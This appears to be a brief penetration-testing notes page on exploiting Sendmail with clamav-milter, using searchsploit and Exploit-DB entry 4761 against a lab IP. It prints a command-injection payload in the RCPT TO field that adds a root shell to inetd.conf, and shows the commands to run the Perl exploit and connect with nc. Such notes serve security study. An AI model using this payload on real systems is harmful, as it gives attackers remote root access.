# ClamAV

### Search vulnerability  

```
searchsploit clamav
```

<figure><img src="https://4082237222-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FnA4bAkddGXesk1QCLYAY%2Fuploads%2FSYc0KgSrGzqoX0SIwZnn%2Fimage.png?alt=media&#x26;token=baf50329-7035-4bf4-ae33-85f45143baf2" alt=""><figcaption></figcaption></figure>

Sendmail w/ clamav-milter Remote Root Exploit <https://www.exploit-db.com/exploits/4761>

{% code overflow="wrap" %}

```bash
# You can run an arbitrary command after nobody+\"| 

print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
```

{% endcode %}

```bash
# Netcat listener
kali> nc 192.168.174.42 31337 

# Exploit 
# Modify the perl script and then execute the script
kali> perl 4761.pl 192.168.174.42
```

<figure><img src="https://4082237222-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FnA4bAkddGXesk1QCLYAY%2Fuploads%2FhjKJXJVNDcuetu5W1apf%2Fimage5.png?alt=media&#x26;token=cd0b0070-64f3-4952-a2e6-a2455f395f27" alt=""><figcaption></figcaption></figure>